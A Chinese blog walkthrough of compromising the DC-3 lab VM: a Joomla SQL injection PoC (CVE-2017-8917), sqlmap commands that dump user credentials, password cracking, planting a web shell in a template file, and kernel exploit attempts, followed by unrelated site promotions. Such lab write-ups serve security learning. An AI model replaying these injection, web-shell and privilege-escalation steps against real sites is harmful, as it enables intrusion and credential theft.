DC3打靶思路总结

山有木兮木有枝，心悦君兮君不知。——佚名《越人歌》一、信息收集虚拟机搭建好之后，使用netdiscover探测网络中的IP地址，排除1,2,254这几个DNS、网关地址，显然目标IP是251地址：使用masscan进行快速端口扫描，只发现了80端口，显然只有http服务：访问目标端口，wappalyzer收集到的信息显示目标主机使用的CMS是joomla,web服务器是apache：二、外围打点二

W0ngk

1443人浏览 · 2022-01-03 14:50:15

W0ngk · 2022-01-03 14:50:15 发布

在这里插入图片描述

山有木兮木有枝，心悦君兮君不知。 ——佚名《越人歌》

一、信息收集

虚拟机搭建好之后，使用netdiscover探测网络中的IP地址，排除1,2,254这几个DNS、网关地址，显然目标IP是251地址：
在这里插入图片描述

使用masscan进行快速端口扫描，只发现了80端口，显然只有http服务：

在这里插入图片描述

访问目标端口，wappalyzer收集到的信息显示目标主机使用的CMS是joomla,web服务器是apache：

在这里插入图片描述

二、外围打点

二话不说，直接上漏扫，Xray yyds！！！！

在这里插入图片描述

根据漏扫信息显示，目标靶机存在Sql注入漏洞，CVE编号为：CVE-2017-8917.

查询到公开的POC：index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

使用该POC进行验证，成功得到user信息。

在这里插入图片描述

使用SQLmap进行漏洞利用，依次爆出数据库、表、列、用户信息等。

获取数据库信息：python sqlmap.py -u "http://192.168.17.251/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=123" -p list[fullordering] --dbms=mysql --dbms=mysql --dbs

在这里插入图片描述

获取joomladb中是表信息： python sqlmap.py -u "http://192.168.17.251/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=123" -p list[fullordering] --dbms=mysql --dbms=mysql -D joomladb --tables

此处太多，只截取部分，其中重点关注的是 #_users 表。

在这里插入图片描述

获取users表中的列信息：python sqlmap.py -u "http://192.168.17.251/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=123" -p list[fullordering] --dbms=mysql --dbms=mysql -D joomladb -T “#__users" --columns

在这里插入图片描述

获取表中数据：python sqlmap.py -u "http://192.168.17.251/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=123" -p list[fullordering] --dbms=mysql --dbms=mysql -D joomladb -T “#__users" --dump

在这里插入图片描述

获取到加密后的密码，然后使用john破解密码（需要提前将密码写入passwd.txt）

在这里插入图片描述

使用破解得到的密码进行登陆，成功登陆后台（joomla后台地址：/administrator）：

在这里插入图片描述

进入后台后，直接该php文件getshell, 依次访问extensions -->templates–>template,然后随便选一个模板，在左侧选择一个PHP文件进行修改，写入我们的shell（此处我写入的是哥斯拉的shell）

在这里插入图片描述
直接访问http://192.168.17.251/templates/beez3/error.php，成功访问到，说明文件存在。

使用哥斯拉连接，成功getshell.

在这里插入图片描述

三、权限提升

已经拿到shell的我们，发现权限并不是特别高，尝试使用SUID和SUDO提权，一通操作下来，发现既没有可用于SUID提权的命令，也没有可用于SUDO提权的文件，并且SUDO版本也不适用于缓冲区溢出提权。

在这里插入图片描述

于是只能另寻思路，考虑使用内核漏洞进行提权，先查看内核版本为linux 4.4.0-21：

在这里插入图片描述

因此上kali中搜索可以利用的攻击脚本,发现多个可利用的的本体提权漏洞：

commond: searchexploit linux 4.4.0

在这里插入图片描述

首先在kali上进行编译：

gcc -o test2 44298.c

将编译好的EXP下载到目标主机上进行提权(一顿操作下来执行失败，只能无奈尝试其他exp)：

在这里插入图片描述

尝试了其他提权脚本和使用脏牛都失败后，问度娘才发现需要使用39772.txt中的exp进行提权。

在这里插入图片描述

在靶机上下载EXP并进行解压，依次执行：

unzip 37992.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput

执行成功，但是还是没有root权限，fuck了！！！，菜鸡无语，只能止步于此了！

在这里插入图片描述

华为开发者空间

华为开发者空间，是为全球开发者打造的专属开发空间，汇聚了华为优质开发资源及工具，致力于让每一位开发者拥有一台云主机，基于华为根生态开发、创新。

更多推荐

华为云2篇论文分别入选国际顶会KDD25和ACM SIGCOMM‘25

华为开发者空间

融合多元定位技术，帮助应用破解精准定位难题

从查阅天气到记录运动轨迹，从打车到路径规划等，移动终端已深入人们日常生活的方方面面，看似简单的操作背后，都依赖于精准的定位技术。对于应用开发者，位置数据的实时性与准确性直接决定用户体验。当前主流定位技术正面临两难选择：GPS等卫星定位虽能实现＜5米的高精度，却需长时间开启硬件模块，导致设备耗电量激增，且冷启动时受卫星信号搜索、数据计算影响，等待时长普遍达10-30秒；而基站/Wi-Fi定位虽能秒级